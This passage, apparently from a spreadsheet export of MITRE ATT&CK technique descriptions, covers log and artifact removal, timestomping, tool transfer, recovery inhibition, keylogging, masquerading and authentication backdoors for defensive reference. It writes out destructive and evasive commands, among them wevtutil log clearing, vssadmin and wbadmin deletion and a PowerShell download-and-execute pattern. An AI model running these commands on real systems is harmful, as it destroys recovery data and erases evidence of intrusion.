Adversaries may manipulate email mailbox data to remove logs and artifacts, such as evidence of [Phishing](https://attack.mitre.org/techniques/T1566)/[Internal Spearphishing](https://attack.mitre.org/techniques/T1534), [Email Collection](https://attack.mitre.org/techniques/T1114), [Mail Protocols](https://attack.mitre.org/techniques/T1071/003) for command and control, or email-based exfiltration such as [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048). For example, to remove evidence on Exchange servers adversaries have used the &lt;code&gt;ExchangePowerShell&lt;/code&gt; [PowerShell](https://attack.mitre.org/techniques/T1059/001) module, including &lt;code&gt;Remove-MailboxExportRequest&lt;/code&gt; to remove evidence of mailbox exports.(Citation: Volexity SolarWinds)(Citation: ExchangePowerShell Module) On Linux and macOS, adversaries may also delete emails through a command line utility called &lt;code&gt;mail&lt;/code&gt;  or use [AppleScript](https://attack.mitre.org/techniques/T1059/002) to interact with APIs on macOS.(Citation: Cybereason Cobalt Kitty 2017)(Citation: mailx man page)</t>
  </si>
  <si>
    <t>Adversaries may clear or remove evidence of malicious network connections in order to clean up traces of their operations. Configuration settings as well as various artifacts that highlight connection history may be created on a system from behaviors that require network connections, such as [Remote Services](https://attack.mitre.org/techniques/T1021) or [External Remote Services](https://attack.mitre.org/techniques/T1133). Defenders may use these artifacts to monitor or otherwise analyze network connections created by adversaries.
Network connection history may be stored in various locations on a system. For example, RDP connection history may be stored in Windows Registry values under (Citation: Microsoft RDP Removal):
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default&lt;/code&gt;
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers&lt;/code&gt;
Windows may also store information about recent RDP connections in files such as &lt;code&gt;C:\Users\\%username%\Documents\Default.rdp&lt;/code&gt; and `C:\Users\%username%\AppData\Local\Microsoft\Terminal
Server Client\Cache\`.(Citation: Moran RDPieces) Similarly, macOS and Linux hosts may store information highlighting connection history in system logs (such as those stored in `/Library/Logs` and/or `/var/log/`).(Citation: Apple Culprit Access)(Citation: FreeDesktop Journal)(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)
Malicious network connections may also require changes to network configuration settings, such as [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1562/004) or tampering to enable [Proxy](https://attack.mitre.org/techniques/T1090). Adversaries may delete or modify this data to conceal indicators and/or impede defensive analysis.</t>
  </si>
  <si>
    <t>Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such as removing services, deleting executables, [Modify Registry](https://attack.mitre.org/techniques/T1112), [Plist File Modification](https://attack.mitre.org/techniques/T1647), or other methods of cleanup to prevent defenders from collecting evidence of their persistent presence.(Citation: Cylance Dust Storm)
In some instances, artifacts of persistence may also be removed once an adversary’s persistence is executed in order to prevent errors with the new instance of the malware.(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer's alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit.
The event logs can be cleared with the following utility commands:
* &lt;code&gt;wevtutil cl system&lt;/code&gt;
* &lt;code&gt;wevtutil cl application&lt;/code&gt;
* &lt;code&gt;wevtutil cl security&lt;/code&gt;
These logs may also be cleared through other mechanisms, such as the event viewer GUI or [PowerShell](https://attack.mitre.org/techniques/T1059/001).</t>
  </si>
  <si>
    <t>Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well.(Citation: Microsoft SDelete July 2016) Examples of built-in [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) functions include &lt;code&gt;del&lt;/code&gt; on Windows and &lt;code&gt;rm&lt;/code&gt; or &lt;code&gt;unlink&lt;/code&gt; on Linux and macOS.</t>
  </si>
  <si>
    <t>Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation. Windows shared drive and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) connections can be removed when no longer needed. [Net](https://attack.mitre.org/software/S0039) is an example utility that can be used to remove network share connections with the &lt;code&gt;net use \\system\share /delete&lt;/code&gt; command. (Citation: Technet Net Use)</t>
  </si>
  <si>
    <t>Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)</t>
  </si>
  <si>
    <t>Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)
Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.</t>
  </si>
  <si>
    <t>Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)). 
Files can also be transferred using various [Web Service](https://attack.mitre.org/techniques/T1102)s as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016)
On Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such as &lt;code&gt;IEX(New-Object Net.WebClient).downloadString()&lt;/code&gt; and &lt;code&gt;Invoke-WebRequest&lt;/code&gt;. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas)</t>
  </si>
  <si>
    <t>Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.
Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017)
A number of native Windows utilities have been used by adversaries to disable or delete system recovery features:
* &lt;code&gt;vssadmin.exe&lt;/code&gt; can be used to delete all volume shadow copies on a system - &lt;code&gt;vssadmin.exe delete shadows /all /quiet&lt;/code&gt;
* [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - &lt;code&gt;wmic shadowcopy delete&lt;/code&gt;
* &lt;code&gt;wbadmin.exe&lt;/code&gt; can be used to delete the Windows Backup Catalog - &lt;code&gt;wbadmin.exe delete catalog -quiet&lt;/code&gt;
* &lt;code&gt;bcdedit.exe&lt;/code&gt; can be used to disable automatic Windows recovery features by modifying boot configuration data - &lt;code&gt;bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures &amp; bcdedit /set {default} recoveryenabled no&lt;/code&gt;</t>
  </si>
  <si>
    <t>Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004)) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. [Web Portal Capture](https://attack.mitre.org/techniques/T1056/003)).</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001),  this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
* **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)
* **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
* **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)).
Adversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.(Citation: OSX Malware Exploits MacKeeper) This type of prompt can be used to collect credentials via various languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware)(Citation: Spoofing credential dialogs) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015)(Citation: Spoofing credential dialogs) On Linux systems adversaries may launch dialog boxes prompting users for credentials from malicious shell scripts or the command line (i.e. [Unix Shell](https://attack.mitre.org/techniques/T1059/004)).(Citation: Spoofing credential dialogs) </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured.
Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.(Citation: Adventures of a Keystroke) Some methods include:
* Hooking API callbacks used for processing keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), this focuses solely on API functions intended for processing keystroke data.
* Reading raw keystroke data from the hardware buffer.
* Windows Registry modifications.
* Custom drivers.
* [Modify System Image](https://attack.mitre.org/techniques/T1601) may provide adversaries with hooks into the operating system of network devices to read raw keystrokes for login sessions.(Citation: Cisco Blog Legacy Device Attacks) </t>
  </si>
  <si>
    <t>Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
This variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through [External Remote Services](https://attack.mitre.org/techniques/T1133) and [Valid Accounts](https://attack.mitre.org/techniques/T1078) or as part of the initial compromise by exploitation of the externally facing web service.(Citation: Volexity Virtual Private Keylogging)</t>
  </si>
  <si>
    <t>Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or synchronize execution. IPC is also commonly used to avoid situations such as deadlocks, which occurs when processes are stuck in a cyclic waiting pattern. 
Adversaries may abuse IPC to execute arbitrary code or commands. IPC mechanisms may differ depending on OS, but typically exists in a form accessible through programming languages/libraries or native interfaces such as Windows [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) or [Component Object Model](https://attack.mitre.org/techniques/T1559/001). Linux environments support several different IPC mechanisms, two of which being sockets and pipes.(Citation: Linux IPC) Higher level execution mediums, such as those of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s, may also leverage underlying IPC mechanisms. Adversaries may also use [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) to facilitate remote IPC execution.(Citation: Fireeye Hunting COM June 2019)</t>
  </si>
  <si>
    <t>Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) Remote COM execution is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as  [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)
Various COM interfaces are exposed that can be abused to invoke arbitrary execution via a variety of programming languages such as C, C++, Java, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).(Citation: Microsoft COM) Specific COM objects also exist to directly perform functions beyond code execution, such as creating a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), fileless download/execution, and other adversary behaviors related to privilege escalation and persistence.(Citation: Fireeye Hunting COM June 2019)(Citation: ProjectZero File Write EoP Apr 2018)</t>
  </si>
  <si>
    <t>Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.
Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by [Component Object Model](https://attack.mitre.org/techniques/T1559/001), DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys.(Citation: BleepingComputer DDE Disabled in Word Dec 2017)(Citation: Microsoft ADV170021 Dec 2017)(Citation: Microsoft DDE Advisory Nov 2017)
Microsoft Office documents can be poisoned with DDE commands, directly or through embedded files, and used to deliver execution via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros.(Citation: SensePost PS DDE May 2016)(Citation: Kettle CSV DDE Aug 2014)(Citation: Enigma Reviving DDE Jan 2018)(Citation: SensePost MacroLess DDE Oct 2017) Similarly, adversaries may infect payloads to execute applications and/or commands on a victim device by way of embedding DDE formulas within a CSV file intended to be opened through a Windows spreadsheet program.(Citation: OWASP CSV Injection)(Citation: CSV Excel Macro Injection )
DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). DDE execution can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)</t>
  </si>
  <si>
    <t>Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service &lt;code&gt;C API&lt;/code&gt; or the high level &lt;code&gt;NSXPCConnection API&lt;/code&gt; in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)
Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).</t>
  </si>
  <si>
    <t>Adversaries may use internal spearphishing to gain access to additional information or exploit other users within the same organization after they already have access to accounts or systems within the environment. Internal spearphishing is multi-staged campaign where an email account is owned either by controlling the user's device with previously installed malware or by compromising the account credentials of the user. Adversaries attempt to take advantage of a trusted internal account to increase the likelihood of tricking the target into falling for the phish attempt.(Citation: Trend Micro When Phishing Starts from the Inside 2017)
Adversaries may leverage [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) or [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) as part of internal spearphishing to deliver a payload or redirect to an external site to capture credentials through [Input Capture](https://attack.mitre.org/techniques/T1056) on sites that mimic email login interfaces.
There have been notable incidents where internal spearphishing has been used. The Eye Pyramid campaign used phishing emails with malicious attachments for lateral movement between victims, compromising nearly 18,000 email accounts in the process.(Citation: Trend Micro When Phishing Starts from the Inside 2017) The Syrian Electronic Army (SEA) compromised email accounts at the Financial Times (FT) to steal additional account credentials. Once FT learned of the campaign and began warning employees of the threat, the SEA sent phishing emails mimicking the Financial Times IT department and were able to compromise even more users.(Citation: THE FINANCIAL TIMES LTD 2019.)</t>
  </si>
  <si>
    <t>Adversaries may transfer tools or other files between systems in a compromised environment. Once brought into the victim environment (i.e. [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) files may then be copied from one system to another to stage adversary tools or other files over the course of an operation. Adversaries may copy files between internal victim systems to support lateral movement using inherent file sharing protocols such as file sharing over [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) to connected network shares or with authenticated connections via [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001).(Citation: Unit42 LockerGoga 2019)
Files can also be transferred using native or otherwise present tools on the victim system, such as scp, rsync, curl, sftp, and [ftp](https://attack.mitre.org/software/S0095).</t>
  </si>
  <si>
    <t>Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Renaming abusable system utilities to evade security monitoring is also a form of [Masquerading](https://attack.mitre.org/techniques/T1036).(Citation: LOLBAS Main Site)</t>
  </si>
  <si>
    <t>Adversaries may abuse a double extension in the filename as a means of masquerading the true file type. A file name may include a secondary file type extension that may cause only the first extension to be displayed (ex: &lt;code&gt;File.txt.exe&lt;/code&gt; may render in some views as just &lt;code&gt;File.txt&lt;/code&gt;). However, the second extension is the true file type that determines how the file is opened and executed. The real file extension may be hidden by the operating system in the file browser (ex: explorer.exe), as well as in any software configured using or similar to the system’s policies.(Citation: PCMag DoubleExtension)(Citation: SOCPrime DoubleExtension) 
Adversaries may abuse double extensions to attempt to conceal dangerous file types of payloads. A very common usage involves tricking a user into opening what they think is a benign file type but is actually executable code. Such files often pose as email attachments and allow an adversary to gain [Initial Access](https://attack.mitre.org/tactics/TA0001) into a user’s system via [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) then [User Execution](https://attack.mitre.org/techniques/T1204). For example, an executable file attachment named &lt;code&gt;Evil.txt.exe&lt;/code&gt; may display as &lt;code&gt;Evil.txt&lt;/code&gt; to a user. The user may then view it as a benign text file and open it, inadvertently executing the hidden malware.(Citation: SOCPrime DoubleExtension)
Common file types, such as text files (.txt, .doc, etc.) and image files (.jpg, .gif, etc.) are typically used as the first extension to appear benign. Executable extensions commonly regarded as dangerous, such as .exe, .lnk, .hta, and .scr, often appear as the second extension and true file type.</t>
  </si>
  <si>
    <t>Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017)
Unlike [Code Signing](https://attack.mitre.org/techniques/T1553/002), this activity will not result in a valid signature.</t>
  </si>
  <si>
    <t>Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or benign. Tasks/services executed by the Task Scheduler or systemd will typically be given a name and/or description.(Citation: TechNet Schtasks)(Citation: Systemd Service Units) Windows services will have a service name as well as a display name. Many benign tasks and services exist that have commonly associated names. Adversaries may give tasks or services names that are similar or identical to those of legitimate ones.
Tasks or services contain other fields, such as a description, that adversaries may attempt to make appear legitimate.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Fysbis Dr Web Analysis)</t>
  </si>
  <si>
    <t>Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.
Adversaries may also use the same icon of the file they are trying to mimic.</t>
  </si>
  <si>
    <t>Adversaries may rename legitimate system utilities to try to evade security mechanisms concerning the usage of those utilities. Security monitoring and control mechanisms may be in place for system utilities adversaries are capable of abusing. (Citation: LOLBAS Main Site) It may be possible to bypass those security mechanisms by renaming the utility prior to utilization (ex: rename &lt;code&gt;rundll32.exe&lt;/code&gt;). (Citation: Elastic Masquerade Ball) An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named &lt;code&gt;March 25 \u202Excod.scr&lt;/code&gt; will display as &lt;code&gt;March 25 rcs.docx&lt;/code&gt;. A JavaScript file named &lt;code&gt;photo_high_re\u202Egnp.js&lt;/code&gt; will be displayed as &lt;code&gt;photo_high_resj.png&lt;/code&gt;.(Citation: Infosecinstitute RTLO Technique)
Adversaries may abuse the RTLO character as a means of tricking a user into executing what they think is a benign file type. A common use of this technique is with [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)/[Malicious File](https://attack.mitre.org/techniques/T1204/002) since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber Crime) RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default.</t>
  </si>
  <si>
    <t>Adversaries can hide a program's true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system.
For example, if there is a Mach-O executable file called &lt;code&gt;evil.bin&lt;/code&gt;, when it is double clicked by a user, it will launch Terminal.app and execute. If this file is renamed to &lt;code&gt;evil.txt&lt;/code&gt;, then when double clicked by a user, it will launch with the default text editing application (not executing the binary). However, if the file is renamed to &lt;code&gt;evil.txt &lt;/code&gt; (note the space at the end), then when double clicked by a user, the true file type is determined by the OS and handled appropriately and the binary will be executed (Citation: Mac Backdoors are back).
Adversaries can use this feature to trick users into double clicking benign-looking files of any format and ultimately executing something malicious.</t>
  </si>
  <si>
    <t>Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
Adversaries may maliciously modify a part of this process to either reveal credentials or bypass authentication mechanisms. Compromised credentials or access may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop.</t>
  </si>
  <si>
    <t>Adversaries may patch the authentication process on a domain controller to bypass the typical authentication mechanisms and enable access to accounts. 
Malware may be used to inject false credentials into the authentication process on a domain controller with the intent of creating a backdoor used to access any user’s account and/or credentials (ex: [Skeleton Key](https://attack.mitre.org/software/S0007)). Skeleton key works through a patch on an enterprise domain controller authentication process (LSASS) with credentials that adversaries may use to bypass the standard authentication system. Once patched, an adversary can use the injected password to successfully authenticate as any domain user account (until the the skeleton key is erased from memory by a reboot of the domain controller). Authenticated access may enable unfettered access to hosts and/or resources within single-factor authentication environments.(Citation: Dell Skeleton)</t>
  </si>
  <si>
    <t>Adversaries may patch, modify, or otherwise backdoor cloud authentication processes that are tied to on-premises user identities in order to bypass typical authentication mechanisms, access credentials, and enable persistent access to accounts.  
Many organizations maintain hybrid user and device identities that are shared between on-premises and cloud-based environments. These can be maintained in a number of ways. For example, Azure AD includes three options for synchronizing identities between Active Directory and Azure AD(Citation: Azure AD Hybrid Identity):
* Password Hash Synchronization (PHS), in which a privileged on-premises account synchronizes user password hashes between Active Directory and Azure AD, allowing authentication to Azure AD to take place entirely in the cloud 
* Pass Through Authentication (PTA), in which Azure AD authentication attempts are forwarded to an on-premises PTA agent, which validates the credentials against Active Directory 
* Active Directory Federation Services (AD FS), in which a trust relationship is established between Active Directory and Azure AD 
AD FS can also be used with other SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication process to AD FS and receive a token containing the hybrid users’ identity and privileges. 
By modifying authentication processes tied to hybrid identities, an adversary may be able to establish persistent privileged access to cloud resources. For example, adversaries who compromise an on-premises server running a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService` process that authorizes all attempts to authenticate to Azure AD, as well as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation: AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary may edit the `Microsoft.IdentityServer.Servicehost` configuration file to load a malicious DLL that generates authentication tokens for any user with any set of claims, thereby bypassing multi-factor authentication and defined AD FS policies.(Citation: MagicWeb)
In some cases, adversaries may be able to modify the hybrid identity authentication process from the cloud. For example, adversaries who compromise a Global Administrator account in an Azure AD tenant may be able to register a new PTA agent via the web console, similarly allowing them to harvest credentials and log into the Azure AD environment as any user.(Citation: Mandiant Azure AD Backdoors)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may disable or modify multi-factor authentication (MFA) mechanisms to enable persistent access to compromised accounts.
Once adversaries have gained access to a network by either compromising an account lacking MFA or by employing an MFA bypass method such as [Multi-Factor Authentication Request Generation](https://attack.mitre.org/techniques/T1621), adversaries may leverage their access to modify or completely disable MFA defenses. This can be accomplished by abusing legitimate features, such as excluding users from Azure AD Conditional Access Policies, registering a new yet vulnerable/adversary-controlled MFA method, or by manually patching MFA programs and configuration files to bypass expected functionality.(Citation: Mandiant APT42)(Citation: Azure AD Conditional Access Exclusions)
For example, modifying the Windows hosts file (`C:\windows\system32\drivers\etc\hosts`) to redirect MFA calls to localhost instead of an MFA server may cause the MFA process to fail. If a "fail open" policy is in place, any otherwise successful authentication attempt may be granted access without enforcing MFA. (Citation: Russians Exploit Default MFA Protocol - CISA March 2022) 
Depending on the scope, goals, and privileges of the adversary, MFA defenses may be disabled for individual accounts or for all accounts tied to a larger group, such as all domain accounts in a victim's network environment.(Citation: Russians Exploit Default MFA Protocol - CISA March 2022) </t>
  </si>
  <si>
    <t>Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
[Modify System Image](https://attack.mitre.org/techniques/T1601) may include implanted code to the operating system for network devices to provide access for adversaries using a specific password.  The modification includes a specific password which is implanted in the operating system image via the patch.  Upon authentication attempts, the inserted code will first check to see if the user input is the password. If so, access is granted. Otherwise, the implanted code will pass the credentials on for verification of potentially valid credentials.(Citation: Mandiant - Synful Knock)</t>
  </si>
  <si>
    <t>Adversaries may register malicious password filter dynamic link libraries (DLLs) into the authentication process to acquire user credentials as they are validated. 
Windows password filters are password policy enforcement mechanisms for both domain and local accounts. Filters are implemented as DLLs containing a method to validate potential passwords against password policies. Filter DLLs can be positioned on local computers for local accounts and/or domain controllers for domain accounts. Before registering new passwords in the Security Accounts Manager (SAM), the Local Security Authority (LSA) requests validation from each registered filter. Any potential changes cannot take effect until every registered filter acknowledges validation. 
Adversaries can register malicious password filters to harvest credentials from local computers and/or entire domains. To perform proper validation, filters must receive plain-text credentials from the LSA. A malicious password filter would receive these plain-text credentials every time a password request is made.(Citation: Carnal Ownage Password Filters Sept 2013)</t>
  </si>
  <si>
    <t>Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is &lt;code&gt;pam_unix.so&lt;/code&gt;, which retrieves, sets, and verifies account authentication information in &lt;code&gt;/etc/passwd&lt;/code&gt; and &lt;code&gt;/etc/shadow&lt;/code&gt;.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
Adversaries may modify components of the PAM system to create backdoors. PAM components, such as &lt;code&gt;pam_unix.so&lt;/code&gt;, can be patched to accept arbitrary adversary supplied values as legitimate credentials.(Citation: PAM Backdoor)
Malicious modifications to the PAM system may also be abused to steal credentials. Adversaries may infect PAM resources with code to harvest user credentials, since the values exchanged with PAM components may be plain-text since PAM does not store passwords.(Citation: PAM Creds)(Citation: Apple PAM)</t>
  </si>
  <si>
